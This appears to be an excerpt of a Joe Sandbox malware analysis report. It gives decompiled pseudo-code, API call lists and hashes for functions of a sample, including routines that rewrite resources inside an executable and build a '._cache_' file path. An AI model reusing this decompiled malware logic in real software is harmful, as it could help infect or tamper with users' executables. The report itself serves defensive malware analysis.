                                                                                                                                                                                                                            0x00454ac8
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454acd
                                                                                                                                                                                                                            0x00454a9f
                                                                                                                                                                                                                            0x00454ad2
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454ad3
                                                                                                                                                                                                                            0x00454a7d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetMenu.USER32(00000000), ref: 00454B68
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454B85
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000), ref: 00454BBA
                                                                                                                                                                                                                            • SetMenu.USER32(00000000,00000000,00000000,00454C0A), ref: 00454BD6
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Menu$LoadString
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3688185913-0
                                                                                                                                                                                                                            • Opcode ID: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                                                                                                                                                                                            • Instruction ID: 8074770e88abfcf8b34beed0e108b3c66a7315ec12ddf3ed763e984ff9a80418
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19c4293b5f1cdaa323bef84bcc34fad9663e5c1fef850695ee91956a4cd23356
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21518130A043445ADB61EF6A888575A7AA4AB8430DF0545BBEC059F3A3CA7CEC89875D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402188 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlInitializeCriticalSection.KERNEL32(0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AB2
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlEnterCriticalSection.KERNEL32(0049E5CC,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AC5
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: LocalAlloc.KERNEL32(00000000,00000FF8,0049E5CC,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401AEF
                                                                                                                                                                                                                              • Part of subcall function 00401A9C: RtlLeaveCriticalSection.KERNEL32(0049E5CC,00401B59,00000000,',?,?,00402336,02210000,?,00000000,?,?,00401D25,00401D3A,00401E8B), ref: 00401B4C
                                                                                                                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0049E5CC,00000000,7 ), ref: 004021D3
                                                                                                                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049E5CC,0040230B), ref: 004022FE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                                                                                                                                                            • String ID: 7
                                                                                                                                                                                                                            • API String ID: 2227675388-1331172448
                                                                                                                                                                                                                            • Opcode ID: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction ID: 4af8bea66c2055acf7768281f877aa53f35be4b0bc747d0b7dec25e4a478ddf4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d57fdd7a51c297de22ae7a43f37e9dc48cc1f2cd16773fd01e790cee451199b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441E2B1A04200DFD715CFAADE9562977E0FB68328B6542BFD401E77E1E2799C41CB08
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042C5E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E0042C5E4(int _a4) {
				void* __ebx;
				void* __ebp;
				signed int _t2;
				signed int _t3;
				void* _t7;
				int _t8;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t8 = _a4;
				if( *0x49e928 == 0) {
					 *0x49e900 = E0042C4FC(0, _t8,  *0x49e900, _t17, _t18);
					_t7 =  *0x49e900(_t8); // executed
					return _t7;
				}
				_t3 = _t2 | 0xffffffff;
				_t12 = _t8 + 0xffffffb4 - 2;
				__eflags = _t12;
				if(__eflags < 0) {
					_t3 = 0;
				} else {
					if(__eflags == 0) {
						_t8 = 0;
					} else {
						_t13 = _t12 - 1;
						__eflags = _t13;
						if(_t13 == 0) {
							_t8 = 1;
						} else {
							__eflags = _t13 - 0xffffffffffffffff;
							if(_t13 - 0xffffffffffffffff < 0) {
								_t3 = 1;
							}
						}
					}
				}
				__eflags = _t3 - 0xffffffff;
				if(_t3 != 0xffffffff) {
					return _t3;
				} else {
					return GetSystemMetrics(_t8);
				}
			}













                                                                                                                                                                                                                            0x0042c5e8
                                                                                                                                                                                                                            0x0042c5f2
                                                                                                                                                                                                                            0x0042c606
                                                                                                                                                                                                                            0x0042c60c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c60c
                                                                                                                                                                                                                            0x0042c614
                                                                                                                                                                                                                            0x0042c61c
                                                                                                                                                                                                                            0x0042c61c
                                                                                                                                                                                                                            0x0042c61f
                                                                                                                                                                                                                            0x0042c633
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c637
                                                                                                                                                                                                                            0x0042c623
                                                                                                                                                                                                                            0x0042c623
                                                                                                                                                                                                                            0x0042c623
                                                                                                                                                                                                                            0x0042c624
                                                                                                                                                                                                                            0x0042c63b
                                                                                                                                                                                                                            0x0042c626
                                                                                                                                                                                                                            0x0042c627
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62c
                                                                                                                                                                                                                            0x0042c62a
                                                                                                                                                                                                                            0x0042c624
                                                                                                                                                                                                                            0x0042c621
                                                                                                                                                                                                                            0x0042c640
                                                                                                                                                                                                                            0x0042c643
                                                                                                                                                                                                                            0x0042c64d
                                                                                                                                                                                                                            0x0042c645
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042c646

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 0042C646
                                                                                                                                                                                                                              • Part of subcall function 0042C4FC: GetProcAddress.KERNEL32(74690000,00000000), ref: 0042C57C
                                                                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL ref: 0042C60C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressCallbackDispatcherMetricsProcSystemUser
                                                                                                                                                                                                                            • String ID: GetSystemMetrics
                                                                                                                                                                                                                            • API String ID: 54681038-96882338
                                                                                                                                                                                                                            • Opcode ID: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction ID: e76955a9c08610525c92f9aeab2c1040e91631f36ff756307eb2880b474183d5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7153245a6465a9df4cfdb0ee701d3aa453044e9105dccc5ca4f6593e8bd1a17a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6EF0B4B07045649ACB709B3DBEC962F7645A7A5374FE0AF33A111472D1C2BCA842529D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00474B04 Relevance: 4.6, APIs: 3, Instructions: 88COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 63%
                                                                                                                                                                                                                            			E00474B04(intOrPtr __eax, void* __ebx, char __ecx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v13;
				void* _v20;
				intOrPtr _v24;
				void* _t33;
				int _t45;
				int _t47;
				char _t48;
				void* _t53;
				intOrPtr _t61;
				intOrPtr _t63;
				void* _t67;
				void* _t68;
				intOrPtr _t69;

				_t67 = _t68;
				_t69 = _t68 + 0xffffffec;
				_v12 = __ecx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t67);
				_push(0x474bff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t69;
				_v24 = E00409A7C(_v8);
				E00409A90(_v8, 0x80);
				_t33 = BeginUpdateResourceA(E00404E80(_v8), 0); // executed
				_t53 = _t33;
				_v13 = _t53 != 0;
				if(_v13 == 0) {
					E00409A90(_v8, _v24);
					_pop(_t61);
					 *[fs:eax] = _t61;
					_push(0x474c06);
					return E004049E4( &_v12, 2);
				} else {
					_push(_t67);
					_push(0x474bd2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t69;
					_v20 = E0040275C(0);
					_t45 = UpdateResourceA(_t53, 0xa, E00404E80(_v12), 0, _v20, 0);
					asm("sbb eax, eax");
					_v13 = _t45 + 1;
					_t47 = EndUpdateResourceA(_t53, 0); // executed
					if(_t47 == 0 || _v13 == 0) {
						_t48 = 0;
					} else {
						_t48 = 1;
					}
					_v13 = _t48;
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(0x474bd9);
					return E0040277C(_v20);
				}
			}


















                                                                                                                                                                                                                            0x00474b05
                                                                                                                                                                                                                            0x00474b07
                                                                                                                                                                                                                            0x00474b0c
                                                                                                                                                                                                                            0x00474b0f
                                                                                                                                                                                                                            0x00474b15
                                                                                                                                                                                                                            0x00474b1d
                                                                                                                                                                                                                            0x00474b24
                                                                                                                                                                                                                            0x00474b25
                                                                                                                                                                                                                            0x00474b2a
                                                                                                                                                                                                                            0x00474b2d
                                                                                                                                                                                                                            0x00474b38
                                                                                                                                                                                                                            0x00474b43
                                                                                                                                                                                                                            0x00474b53
                                                                                                                                                                                                                            0x00474b58
                                                                                                                                                                                                                            0x00474b5c
                                                                                                                                                                                                                            0x00474b64
                                                                                                                                                                                                                            0x00474bdf
                                                                                                                                                                                                                            0x00474be6
                                                                                                                                                                                                                            0x00474be9
                                                                                                                                                                                                                            0x00474bec
                                                                                                                                                                                                                            0x00474bfe
                                                                                                                                                                                                                            0x00474b66
                                                                                                                                                                                                                            0x00474b68
                                                                                                                                                                                                                            0x00474b69
                                                                                                                                                                                                                            0x00474b6e
                                                                                                                                                                                                                            0x00474b71
                                                                                                                                                                                                                            0x00474b7d
                                                                                                                                                                                                                            0x00474b93
                                                                                                                                                                                                                            0x00474b9b
                                                                                                                                                                                                                            0x00474b9e
                                                                                                                                                                                                                            0x00474ba4
                                                                                                                                                                                                                            0x00474bab
                                                                                                                                                                                                                            0x00474bb3
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb7
                                                                                                                                                                                                                            0x00474bb9
                                                                                                                                                                                                                            0x00474bbe
                                                                                                                                                                                                                            0x00474bc1
                                                                                                                                                                                                                            0x00474bc4
                                                                                                                                                                                                                            0x00474bd1
                                                                                                                                                                                                                            0x00474bd1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00409A7C: GetFileAttributesA.KERNEL32(00000000,?,00474B38,00000000,00474BFF), ref: 00409A87
                                                                                                                                                                                                                              • Part of subcall function 00409A90: SetFileAttributesA.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AA2
                                                                                                                                                                                                                              • Part of subcall function 00409A90: GetLastError.KERNEL32(00000000,?,?,?,00000000,00473894,00000000,00000000,00000000,00000000,004738AF), ref: 00409AAB
                                                                                                                                                                                                                            • BeginUpdateResourceA.KERNEL32 ref: 00474B53
                                                                                                                                                                                                                            • UpdateResourceA.KERNEL32 ref: 00474B93
                                                                                                                                                                                                                            • EndUpdateResourceA.KERNEL32 ref: 00474BA4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ResourceUpdate$AttributesFile$BeginErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3622334292-0
                                                                                                                                                                                                                            • Opcode ID: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                                                                                                                                                                                            • Instruction ID: 52e1684931c8bafc800cdd43f2787b7e22df09697c22c7a3fc8d55225dfd733d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c6025a9ba0c3fa00e0f0c327aa18df6933148c4a27423e708942d437b537846
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A6216470B04244AFDB01EBB5DC42BAEB7A9EB45704F5144BBF404F2691D778AE10D658
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004015B4 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004015B4(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00401468(0x49e5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}







                                                                                                                                                                                                                            0x004015b7
                                                                                                                                                                                                                            0x004015c1
                                                                                                                                                                                                                            0x004015d0
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015c3
                                                                                                                                                                                                                            0x004015d6
                                                                                                                                                                                                                            0x004015e3
                                                                                                                                                                                                                            0x004015e8
                                                                                                                                                                                                                            0x004015ea
                                                                                                                                                                                                                            0x004015ee
                                                                                                                                                                                                                            0x004015f7
                                                                                                                                                                                                                            0x004015fe
                                                                                                                                                                                                                            0x0040160a
                                                                                                                                                                                                                            0x00401611
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00401611
                                                                                                                                                                                                                            0x004015fe
                                                                                                                                                                                                                            0x00401616

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004018BD), ref: 004015E3
                                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004018BD), ref: 0040160A
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Virtual$AllocFree
                                                                                                                                                                                                                            • String ID: I
                                                                                                                                                                                                                            • API String ID: 2087232378-1966777607
                                                                                                                                                                                                                            • Opcode ID: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                                                            • Instruction ID: 653e09eb2cf8d2b73dae0cb6bd44d4e3f867a6d1f4cfde1ef7f913290877d0a1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1566d8f6abf6d80f03d096eeda82e70b725eacd03a30ec4fb637c5d0c7dd738
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEF02772F003202BEB3059AA4CC1B535AC49F857A4F194076FD08FF3E9D6B58C0142A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00477AD8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 57%
                                                                                                                                                                                                                            			E00477AD8(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				char _v14;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v56;
				char _v72;
				char _v76;
				char _v80;
				void* __ecx;
				struct HINSTANCE__* _t54;
				void* _t65;
				void* _t67;
				intOrPtr _t120;
				void* _t123;
				struct HINSTANCE__* _t130;
				struct HINSTANCE__* _t133;
				intOrPtr _t141;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr _t153;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t162;

				_t159 = __esi;
				_t158 = __edi;
				_t161 = _t162;
				_t120 = 9;
				do {
					_push(0);
					_push(0);
					_t120 = _t120 - 1;
				} while (_t120 != 0);
				_t1 =  &_v8;
				 *_t1 = _t120;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v13 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				_push(_t161);
				_push(0x477dae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t162;
				_t118 = E00404E80(_v8);
				_t54 =  *0x49e668; // 0x400000
				if(FindResourceA(_t54, _t53, 0xa) != 0) {
					_v14 = 1;
					E00409F48( &_v28);
					_push(_v28);
					_push(0x477dc8);
					_push("._cache_");
					E00402B68(0,  &_v36);
					E00409E18(_v36,  &_v32);
					_push(_v32);
					E00404D40();
					_push(_t161);
					_push(0x477d03);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					_t65 = E00409A48(_v24, __eflags);
					__eflags = _t65;
					if(_t65 != 0) {
						_t67 = E00474C10(_v24, _t118, _v8, __edi, __esi);
						__eflags = _t67;
						if(_t67 != 0) {
							E00409A90(_v24, 0x80);
							E00409BAC(_v24);
							E00404BB8( &_v56, _t118);
							_t130 =  *0x49e668; // 0x400000
							_v20 = E0041E0D0(_t130, 1, 0xa, _v56);
							_push(_t161);
							_push(0x477ca2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t162;
							E0041DD9C(_v20, _t118, _v24, _t158);
							_pop(_t153);
							 *[fs:eax] = _t153;
							E00403BEC(_v20);
						}
					} else {
						E00404BB8( &_v40, _t118);
						_t133 =  *0x49e668; // 0x400000
						_v20 = E0041E0D0(_t133, 1, 0xa, _v40);
						_push(_t161);
						_push(0x477bd6);
						_push( *[fs:eax]);
						 *[fs:eax] = _t162;
						E0041DD9C(_v20, _t118, _v24, __edi); // executed
						_pop(_t157);
						 *[fs:eax] = _t157;
						E00403BEC(_v20);
					}
					_pop(_t141);
					_pop(_t123);
					 *[fs:eax] = _t141;
					__eflags = 0;
					_push(_t161);
					_push(0x477d81);
					_push( *[fs:eax]);
					 *[fs:eax] = _t162;
					E00409A90(_v24, 6);
					E00472EF0( &_v72, _t118, _t123, __eflags);
					E00404DCC(_v72, 0x477de8);
					if(__eflags == 0) {
						E0047475C( &_v80, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v80, _v24, __eflags, 0, 0);
					} else {
						E0047475C( &_v76, _t118, _t158, _t159, __eflags);
						E00473490(_v12, _t118, _v76, _v24, __eflags, 0, _v13); // executed
					}
					_pop(_t145);
					 *[fs:eax] = _t145;
				} else {
					_v14 = 0;
				}
				_pop(_t146);
				 *[fs:eax] = _t146;
				_push(0x477db5);
				E004049E4( &_v80, 0xf);
				return E004049C0( &_v8);
			}
































                                                                                                                                                                                                                            0x00477ad8
                                                                                                                                                                                                                            0x00477ad8
                                                                                                                                                                                                                            0x00477ad9
                                                                                                                                                                                                                            0x00477adc
                                                                                                                                                                                                                            0x00477ae1
                                                                                                                                                                                                                            0x00477ae1
                                                                                                                                                                                                                            0x00477ae3
                                                                                                                                                                                                                            0x00477ae5
                                                                                                                                                                                                                            0x00477ae5
                                                                                                                                                                                                                            0x00477ae8
                                                                                                                                                                                                                            0x00477ae8
                                                                                                                                                                                                                            0x00477aeb
                                                                                                                                                                                                                            0x00477aec
                                                                                                                                                                                                                            0x00477aed
                                                                                                                                                                                                                            0x00477aee
                                                                                                                                                                                                                            0x00477af1
                                                                                                                                                                                                                            0x00477af4
                                                                                                                                                                                                                            0x00477afa
                                                                                                                                                                                                                            0x00477b01
                                                                                                                                                                                                                            0x00477b02
                                                                                                                                                                                                                            0x00477b07
                                                                                                                                                                                                                            0x00477b0a
                                                                                                                                                                                                                            0x00477b17
                                                                                                                                                                                                                            0x00477b1a
                                                                                                                                                                                                                            0x00477b27
                                                                                                                                                                                                                            0x00477b32
                                                                                                                                                                                                                            0x00477b39
                                                                                                                                                                                                                            0x00477b3e
                                                                                                                                                                                                                            0x00477b41
                                                                                                                                                                                                                            0x00477b46
                                                                                                                                                                                                                            0x00477b50
                                                                                                                                                                                                                            0x00477b5b
                                                                                                                                                                                                                            0x00477b60
                                                                                                                                                                                                                            0x00477b6b
                                                                                                                                                                                                                            0x00477b72
                                                                                                                                                                                                                            0x00477b73
                                                                                                                                                                                                                            0x00477b78
                                                                                                                                                                                                                            0x00477b7b
                                                                                                                                                                                                                            0x00477b81
                                                                                                                                                                                                                            0x00477b86
                                                                                                                                                                                                                            0x00477b88
                                                                                                                                                                                                                            0x00477c38
                                                                                                                                                                                                                            0x00477c3d
                                                                                                                                                                                                                            0x00477c3f
                                                                                                                                                                                                                            0x00477c4d
                                                                                                                                                                                                                            0x00477c55
                                                                                                                                                                                                                            0x00477c5f
                                                                                                                                                                                                                            0x00477c6a
                                                                                                                                                                                                                            0x00477c7c
                                                                                                                                                                                                                            0x00477c81
                                                                                                                                                                                                                            0x00477c82
                                                                                                                                                                                                                            0x00477c87
                                                                                                                                                                                                                            0x00477c8a
                                                                                                                                                                                                                            0x00477c93
                                                                                                                                                                                                                            0x00477c9a
                                                                                                                                                                                                                            0x00477c9d
                                                                                                                                                                                                                            0x00477cf4
                                                                                                                                                                                                                            0x00477cf4
                                                                                                                                                                                                                            0x00477b8e
                                                                                                                                                                                                                            0x00477b93
                                                                                                                                                                                                                            0x00477b9e
                                                                                                                                                                                                                            0x00477bb0
                                                                                                                                                                                                                            0x00477bb5
                                                                                                                                                                                                                            0x00477bb6
                                                                                                                                                                                                                            0x00477bbb
                                                                                                                                                                                                                            0x00477bbe
                                                                                                                                                                                                                            0x00477bc7
                                                                                                                                                                                                                            0x00477bce
                                                                                                                                                                                                                            0x00477bd1
                                                                                                                                                                                                                            0x00477c28
                                                                                                                                                                                                                            0x00477c28
                                                                                                                                                                                                                            0x00477cfb
                                                                                                                                                                                                                            0x00477cfd
                                                                                                                                                                                                                            0x00477cfe
                                                                                                                                                                                                                            0x00477d0d
                                                                                                                                                                                                                            0x00477d0f
                                                                                                                                                                                                                            0x00477d10
                                                                                                                                                                                                                            0x00477d15
                                                                                                                                                                                                                            0x00477d18
                                                                                                                                                                                                                            0x00477d23
                                                                                                                                                                                                                            0x00477d2b
                                                                                                                                                                                                                            0x00477d38
                                                                                                                                                                                                                            0x00477d3d
                                                                                                                                                                                                                            0x00477d64
                                                                                                                                                                                                                            0x00477d72
                                                                                                                                                                                                                            0x00477d3f
                                                                                                                                                                                                                            0x00477d48
                                                                                                                                                                                                                            0x00477d56
                                                                                                                                                                                                                            0x00477d56
                                                                                                                                                                                                                            0x00477d79
                                                                                                                                                                                                                            0x00477d7c
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477b29
                                                                                                                                                                                                                            0x00477d8d
                                                                                                                                                                                                                            0x00477d90
                                                                                                                                                                                                                            0x00477d93
                                                                                                                                                                                                                            0x00477da0
                                                                                                                                                                                                                            0x00477dad

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 00477B20
                                                                                                                                                                                                                              • Part of subcall function 00402B68: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,?,00000000,00474795,004747D4,?,00000000,004747BE,?,?,?,?,00000000), ref: 00402B8C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileFindModuleNameResource
                                                                                                                                                                                                                            • String ID: ._cache_
                                                                                                                                                                                                                            • API String ID: 938654709-4202169512
                                                                                                                                                                                                                            • Opcode ID: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                                                                                                                                                                                            • Instruction ID: f4b1b61c27c6b3fcd429a4d8c4df21a5758f96423c611e3672b605c149e07d86
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1813762d8ab73c72f462dcf35abd4216ef9f666e93594e03b5b88217cc4ef2bb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D61D430A042099FDB11EFA5D852AEEB7B9EF49704F60847BF504B7291D739AD01CB68
                                                                                                                                                                                                                            Uniqueness

